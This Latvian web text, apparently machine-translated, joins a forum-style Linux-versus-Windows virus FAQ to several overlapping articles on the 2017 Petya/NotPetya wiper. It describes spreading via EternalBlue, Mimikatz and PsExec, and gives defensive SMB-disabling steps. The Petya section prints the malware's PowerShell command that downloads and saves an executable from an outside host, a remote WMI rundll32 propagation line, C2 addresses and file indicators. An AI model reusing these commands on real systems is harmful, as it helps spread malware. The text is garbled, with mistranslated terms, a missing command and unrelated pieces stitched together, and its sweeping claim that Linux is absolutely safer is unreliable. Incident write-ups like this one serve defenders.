Tas ir muļķības.

Šis gadījums tikai šķiet mājiens, puiši, bez Windows ir arī Linux, kas, starp citu, ir bezmaksas un uz kura tādas lietas praktiski nav iespējamas.
Starp citu, es jau sen būtu pārgājusi uz līņiem, bet attīstība turas. Es nezinu, kā vilkt tur projektus un atrast piemērotu attīstības vidi.

Šeit ir citāts, kas ņemts no vietnes

Tiek uzskatīts, ka Unix sistēmas ir daudz labāk aizsargātas pret datorvīrusiem nekā Windows operētājsistēmas. Būtībā, joprojām nav plaši izplatīta vīrusa Linux, atrodoties vidē Windows vienkārši ir pilns ar visu veidu infekcijām . Tas lielā mērā ir saistīts ar *nix platformu piekļuves tiesību sistēmu, kā arī iepriekš instalētu tīkla pakalpojumu trūkumu (daudzos izplatījumos), kas pieņem ienākošos savienojumus, un to, ka Linux ievainojamības tiek novērstas ļoti ātri. Bet, neskatoties uz visiem iepriekš minētajiem argumentiem, vīrusi joprojām var apmesties nepietiekami aizsargātās *nix sistēmās un veikt savu viltīgo darbu.

Un tagad es sniegšu atbildes uz visbiežāk uzdotajiem jautājumiem par vīrusiem operētājsistēmā Linux.
1. Vai tas pastāv dabā? vīrusi priekš Linux?
Protams, ir, bet to skaits ir niecīgs, salīdzinot ar operētājsistēma Windows.

2. Vai Windows vīrusi var inficēt Linux OS?
Protams, viņi var, bet tikai tad, ja ir instalēts Wine, kas ir sava veida vide Win lietojumprogrammu palaišanai. Manā praksē bija gadījums, kad .wine mapē esošie vīrusi izauga tik lieli, ka to skaits bija vairāk nekā 17 000, un kopējais izmērs bija nedaudz virs 1Gb. Taču šie vīrusi nekaitē Linux sistēmām. Galu galā viņi var darboties tikai labvēlīgā vidē. Ja operētājsistēmā Windows jums ir jāinstalē, piemēram, jāskenē sistēma, un tas nav fakts, ka pēc tam viss darbosies, tad Ubuntu es vienkārši izdzēsu paketi the.wine un pēc tam vēlreiz instalēju nepieciešamās win-programmas. Manu Ubuntu nekādi nav skārusi liels skaits Windows vīrusu.

3. Vai tā ir taisnība, ka Linux ir drošāks par Windows?
Jā, tā ir absolūta patiesība. Ļaujiet man sniegt jums piemēru. Pastāv uzskats, ka Linux ir maz vīrusu, jo tā daļa operētājsistēmu tirgū ir ārkārtīgi maza, tāpēc vīrusi tiek radīti operētājsistēmai Windows tās lielās popularitātes un izplatības dēļ. Ja Linux būtu bijis populārāks, arī tam būtu uzrakstīts kaudzis vīrusu. Bet tā nav taisnība. Ja ņemam vispopulārāko programmatūru tīmekļa serveriem, tā būtu Apache. 2013. gadā Apache tīmekļa serveru daļa ir gandrīz 45%, un Microsoft IIS tirgus daļa ir 23,10%. No tā izriet, ka hakeru uzbrukumiem vajadzētu būt aktīvākiem vairāk Interneta resursi vietnē Apache, un mums vajadzētu redzēt vairāk tārpu, vīrusu un citas ļaunprātīgas programmatūras, kas vērstas uz Apache un operētājsistēmām, kurās tā darbojas, nekā Windows un IIS. Bet dzīvē viss ir savādāk. Jau ilgu laiku Microsoft IIS ir bijis tīkla tārpu un visu veidu uzbrukumu mērķis.

Galvenās Linux priekšrocības drošības ziņā:

• *nix platformām ir izveidots ļoti maz vīrusu;
• pastāv liels skaits dažādi Linux izplatījumi. Daži strādā ar .deb pakotnēm, citi ar .RPM pakotnēm. Izveidot vīrusu, kas vienādi labi darbosies visos no tiem, ir ļoti grūti;
• Dažādiem izplatījumiem pēc noklusējuma ir instalētas dažādas kopas, kas apkopotas atšķirīgi programmatūra, kas arī samazina masveida inficēšanās iespējamību ar vīrusu;
• Programmas, kas tiek lejupielādētas no interneta, pēc noklusējuma nav izpildāmas operētājsistēmā Linux. Vispirms tie ir jāpadara tādi;
• Galvenais programmatūras avots operētājsistēmā Linux ir pārbaudītas (oficiālās) krātuves. Tas dod mums tiesības apgalvot, ka vīrusu iekļūšanas iespējamība šajos avotos ir ārkārtīgi zema.

Internetā ir jauna izspiedējvīrusa epidēmija. Ļaunprātīga programmatūra praktiski bloķēja desmitiem lielu uzņēmumu darbu, pieprasot atšifrēšanu cietais disks katra darbstacija ir nedaudz zem 400 USD.

Jaunās epidēmijas radītā panika radīja informācijas haosu: pirmkārt, antivīrusu analītiķi paziņoja par otro WannaCry atnākšanu, pēc tam ļaunprogrammatūra tika identificēta kā jaunizveidotu šifrēšanas vīrusu “Petya” un “Misha” komplekss. Šobrīd ir skaidrs, ka, ja vīruss bija balstīts uz Petja, tas tika stipri pārveidots.

Izplatīšanas modelis ir daļēji līdzīgs WannaCry - tiek izmantots MS17-010 ievainojamības izmantošana, kas tika uzlabota, izmantojot sociālo inženieriju, izmantojot MS Word ievainojamību. Inficēšanās notiek pēc tam, kad lietotājs atver e-pasta pielikumu vai lejupielādē failu, kas izmanto 2017. gada aprīlī publicēto ievainojamību CVE-2017-0199. Un izplatīšanu uz citiem tīkla datoriem jau nodrošina virkne metožu:

• zagt lietotāju paroles vai izmantot aktīvas sesijas, lai piekļūtu citiem tīkla mezgliem (tiek izmantots Mimikatz utilīta kods).
• izmantojot SMB ievainojamību (CVE-2017-0144, MS17-010), izmantojot to pašu slaveno EthernalBlue izlietojumu, kas tika veiksmīgi izmantots WannaCry.

Ļaunprātīga programmatūra izmanto zagtu Konti, lai kopētu savu ķermeni admin$ bumbiņās un palaistu tās, izmantojot legālo PsExec utilītu, ko izmanto datora attālinātai vadībai.

Slavenas programmas izstrādātājs Mimikatz, apstiprināja ka tā modificētais kods tiek izmantots paroļu iegūšanai.

Kods WMI interfeisa izmantošanai instalācijas palaišanai tika publicēts arī Microsoft emuārā.

Inficēšanai, izmantojot SMB vektoru, tiek izmantota ievainojamība CVE-2017-0144, kas ir līdzīga WannaCry izmantotajai tehnikai.

Bet šifrēšanas modelis ir ievērojami mainījies salīdzinājumā ar WannaCry. Vīruss, iekļūstot datorā, inficē sistēmas MBR (galveno sāknēšanas ierakstu) un šifrē dažus pirmos cietā diska blokus, ieskaitot galveno failu tabulu, veidojot visu HDD lietotājiem, nevis tikai atsevišķiem failiem, kā to parasti dara izspiedējvīrusi.

Noteikti nav vērts maksāt izpirkuma maksu izspiedējiem un ne tikai ētisku apsvērumu dēļ: vīrusu analītiķi ir nonākuši pie secinājuma, ka failu atšifrēšana pēc izpirkuma maksas samaksas principā nav iespējama. Šī funkcija vienkārši nav iekļauta ļaunprātīgajā programmā. Patiesībā šī nav izspiedējvīrusa epidēmija, bet gan tīrītāja vīrusa epidēmija, kas iznīcina datus.

Saskaņā ar plašsaziņas līdzekļu ziņām Krievijā lielākās problēmas radās korporācijā Rosņeftj, korporācijas galvenās tīmekļa vietnes un Bašņeftj vietne ilgu laiku bija atspējotas.

Plašas infekcijas reģistrētas Francijā, Spānijā, Krievijā un NVS valstīs. Ukrainā vīruss ir skāris desmitiem valdības un komerciālo organizāciju.

Kam tas vajadzīgs?

Tā kā kodā nebija iekļauts atkopšanas mehānisms, uzbrucēju motivēšanai ir trīs iespējamās iespējas. Vai nu viņi gribēja maskēt mērķtiecīgu kāda konkrētu datu iznīcināšanu kā masveida epidēmiju, vai arī gribēja pelnīt naudu, sākotnēji nedomājot neko atjaunot. Vismazāk ticamā iespēja ir kibervandālisms. Vīruss ir nopietns produkts, un prātīgāk būtu tērēt pūles, lai to radītu kaut kam, kas nes naudu. Vandaļi bija izplatīti 90. gados, kad bija modē lauzt sistēmas slavas dēļ, taču tagad tie ir ārkārtīgi reti.

Rezultātā pēdējo 2 mēnešu epidēmiju galvenie ieguvēji acīmredzot bija grupa The Shadow Brokers, kas izplatīja EthernalBlue eksploitu. Paši izspiedēji savāca salīdzinoši nelielas naudas summas, par vairākām kārtām mazāk nekā epidēmijas nodarīto postījumu apjoms. Ir kļuvušas epidēmijas lieliska reklāma The Shadow Brokers, kas apgalvo, ka ir gatavi pārdot informāciju par atlikušajiem varoņdarbiem no NSA arhīva. Galu galā EthernalBlue ir tikai viens no vairākiem desmitiem, kas tika nozagts Slepenajam dienestam 2016. gada augustā.

Uzbrukuma mehānisms

Uzbrucējs var nosūtīt failus vai saites uz tiem (sākotnējā epidēmijas stadijā tie bija faili Petya.apx, myguy.exe, myguy.xls, Order-[jebkurš datums].doc), caur kuriem darbstacija darbojas operētājsistēmā Windows OS. ir inficēts. Piemēram, atverot failu Order-[jebkurš datums].doc, 80. portā tiek sazināties ar serveri 84.200.16.242 un tiek lejupielādēts xls:

powershell.exe -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile("h11p://french-cooking.com/myguy.exe", "%APPDATA%\10807.exe");" (PID: [procesa ID], papildu konteksts: (System.Net.WebClient).DownloadFile("h11p://french-cooking.com/myguy.exe", "%APPDATA%\[nejaušs numurs].exe") ;)

Pēc tam ļaunprogrammatūra mēģina izveidot savienojumu ar serveriem 111.90.139.247:80 un COFFEINOFFICE.XYZ:80, kas, iespējams, ir komandu un kontroles serveri.

Kompromisa rādītāji ir failu klātbūtne:

C:\Windows\perfc.dat
C:\myguy.xls.hta

Pēc pievienošanas resursdatoram tas skenē citas Windows mašīnas tīklā un izplatās, izmantojot MS17-010 aprakstītās ievainojamības (tās pašas, kuras izmantoja WannaCry) portos tcp:135, tcp:139, tcp:445, tcp:1024-. 1035.

Izplatīšanu var veikt arī, izpildot komandu:

Attālā WMI, “procesa izsaukums izveidot “C:\\Windows\\System32\\rundll32.exe \"C:\\Windows\\perfc.dat\" #1"

Infekcijas izplatības diagramma ir ņemta no vietnes blog.kryptoslogic.com

Kā izvairīties no infekcijas?

french-cooking.com:80
84.200.16.242:80
111.90.139.247:80
COFFEINOFFICE.XYZ:80

Petya.apx, myguy.exe, myguy.xls, Pasūtījums-[jebkurš datums].doc

3. Instalējiet ielāpus

4. Konfigurējiet IPS, lai bloķētu MS17-010 ekspluatāciju

5. Lai aizsargātu saimniekdatorus, kas vēl nav inficēti, varat izveidot failu c:\windows\perfc bez paplašinājuma. Šādi mezgli nav inficēti.

Viņi mēģina inficēt, izmantojot labi zināmu SMB protokola ievainojamību (MS17-10).

Profilakses nolūkos varat atspējot SMB (Server Message Block) protokolus lokālajā .

Kā atspējot SMB protokola 1. versiju lokālajā ierīcē:

- skriet

- atvērtajā logā pēc sistēmas uzvednes (C:\Windows\System32>) ievadiet komandu

sc.exe config lanmanworkstation depend=bowser/mrxsmb20/nsi

– nospiediet taustiņu Ievadiet;

– parādīsies ziņojums ;

– pēc sistēmas uzvednes (C:\Windows\System32>) ievadiet komandu

sc.exe config mrxsmb10 start= atspējots

– nospiediet taustiņu Ievadiet;

– parādīsies ziņojums ChangeServiceConfig: veiksme;

- aizvērt logu .

Kā atspējot SMB protokolu 2. un 3. versiju lokālajā ierīcē:

- skriet sistēmas administratora vārdā;

- atvērtajā logā Administrators: Komandrinda pēc sistēmas uzvednes (C:\Windows\System32>) ievadiet komandu

sc.exe config lanmanworkstation depend=bowser/mrxsmb10/nsi

– nospiediet taustiņu Ievadiet;

– parādīsies ziņojums ChangeServiceConfig: veiksme;

– pēc sistēmas uzvednes (C:\Windows\System32>) ievadiet komandu

sc.exe config mrxsmb20 start= atspējots

– nospiediet taustiņu Ievadiet;

– parādīsies ziņojums ChangeServiceConfig: veiksme;

- aizvērt logu .

Kā iespējot SMB 1. versijas protokolu lokālajā ierīcē:

- skriet sistēmas administratora vārdā;

- atvērtajā logā Administrators: komandrinda pēc sistēmas uzvednes (C:\Windows\System32>) ievadiet komandu

– nospiediet taustiņu Ievadiet;

– parādīsies ziņojums ChangeServiceConfig: veiksme;

– pēc sistēmas uzvednes (C:\Windows\System32>) ievadiet komandu

sc.exe config mrxsmb10 start=auto

– nospiediet taustiņu Ievadiet;

– parādīsies ziņojums ChangeServiceConfig: veiksme;

- aizvērt logu .

Kā iespējot SMB 2. un 3. versijas protokolus lokālajā tīklā:

- skriet sistēmas administratora vārdā;

– logā Administrator: Command Prompt, kas tiek atvērts pēc sistēmas uzvednes (C:\Windows\System32>), ievadiet komandu

sc.exe config lanmanworkstation depend=bowser/mrxsmb10/mrxsmb20/nsi

– nospiediet taustiņu Ievadiet;

– parādīsies ziņojums ChangeServiceConfig: veiksme;

– pēc sistēmas uzvednes (C:\Windows\System32>) ievadiet komandu

sc.exe config mrxsmb20 start=auto

– nospiediet taustiņu Ievadiet;

– parādīsies ziņojums ChangeServiceConfig: veiksme;

- aizvērt logu .

Piezīmes

1. Pēc šo izmaiņu veikšanas (SMB protokolu iespējošanas vai atspējošanas) ir jāveic restartēšana.

2. SMB 2. versijas iespējošana vai atspējošana operētājsistēmā Windows arī iespējo vai atspējo SMB 3. versiju. Tas ir saistīts ar to, ka šiem protokoliem tiek izmantota kopēja steka.

3. SMB 2. versijas atspējošana atspējos dažas Windows funkcijas.

4. Giant neiesaka atspējot SMB protokola 2. vai 3. versiju. SMB protokola 2. vai 3. versijas atspējošana ir jāizmanto tikai kā pagaidu problēmu novēršanas pasākums. Neatstājiet SMB 2. vai 3. versiju lietotā ilgu laiku.

Pēdējo nedēļu laikā digitālā pasaule ir piedzīvojusi vairākus nopietnus vīrusu uzbrukumus. Maija vidū sākās masveida datoru inficēšanās ar WannaCry vīrusu. Šī ļaunprogrammatūra ir paredzēta izspiešanai Nauda. Ļaunprātīga programmatūra šifrē visus lietotāja datus datorā, kuru kontrolē operētājsistēma, un pēc tam inficētā datora īpašniekam tiek piedāvāts samaksāt izpirkuma maksu aptuveni 300 USD apmērā (Bitcoin kriptovalūtā), lai saņemtu atšifrēšanas atslēgu. Pavisam nesen parādījās vēl viens ne mazāk bīstams vīruss - Petya.A. Viņš lieto Digitālais paraksts Microsoft un maskējas kā licencēta Windows lietojumprogramma.

Tāpat kā WannaCry, tas izmanto sistēmas ievainojamību, ko sauc par EternalBlue (CVE-2017-0144), pārvaldot WMI un PsExec sistēmas rīkus. Tam nav tālvadības aktivatora, tāpat kā tā maija priekšgājējam, tas ir daudz viltīgāks, un tam ir plašas automātiskās izplatīšanas iespējas.

Kā zināt, vai jūsu dators ir inficēts ar Petya.A?

Personālais dators tiek automātiski atsāknēts, pēc tam tiek parādīts ekrāns ar viltus verifikācijas procedūru cietie diski sistēmas utilīta CHKDSK. Un, kamēr lietotājs it kā gaida skenēšanas pabeigšanu, vīruss sāk šifrēt visus diskos esošos datus. Kad šifrēšanas process ir pabeigts, ekrānā tiek parādīts ziņojums ar izpirkuma maksu.

Kā pasargāt sevi no Petya.A vīrusa?

Pirmais noteikums, kas attiecas uz visiem lietotājiem un vienmēr: neatveriet e-pastus no nezināmiem sūtītājiem. Tas jo īpaši attiecas uz vēstulēm, kurām ir pievienoti daži faili. Lai novērstu vīrusa izplatību, lietotājam iepriekš ir jāatspējo SMB v1/v2/v3 protokols. Kā to izdarīt, var atrast oficiālajās instrukcijās vietnē. Ir nepieciešams aizvērt TCP portus 1024 līdz 1035, kā arī 135 un 445.

• C:\Windows\perfc.dat


• C:\myguy.xls.hta


• %APPDATA%\10807.exe

Tīkla drošības speciālisti pamanīja interesantu iezīmi. Ja izveidojat perfc failu (bez paplašinājuma) mapē ar operētājsistēmu, tas neļaus vīrusam darboties personālais dators. Ja dators tiek spontāni atsāknēts un sākas diska skenēšana, tas nekavējoties jāizslēdz un jāatvieno dators no tīkla, lai izvairītos no citu iekārtu inficēšanas. Ja iespējams, jums vajadzētu izveidot datu kopiju un mēģināt atjaunot sāknēšanas ielādētāju, izmantojot bootrec sistēmas utilītu, sāknējot no diska vai sistēmas zibatmiņas diska.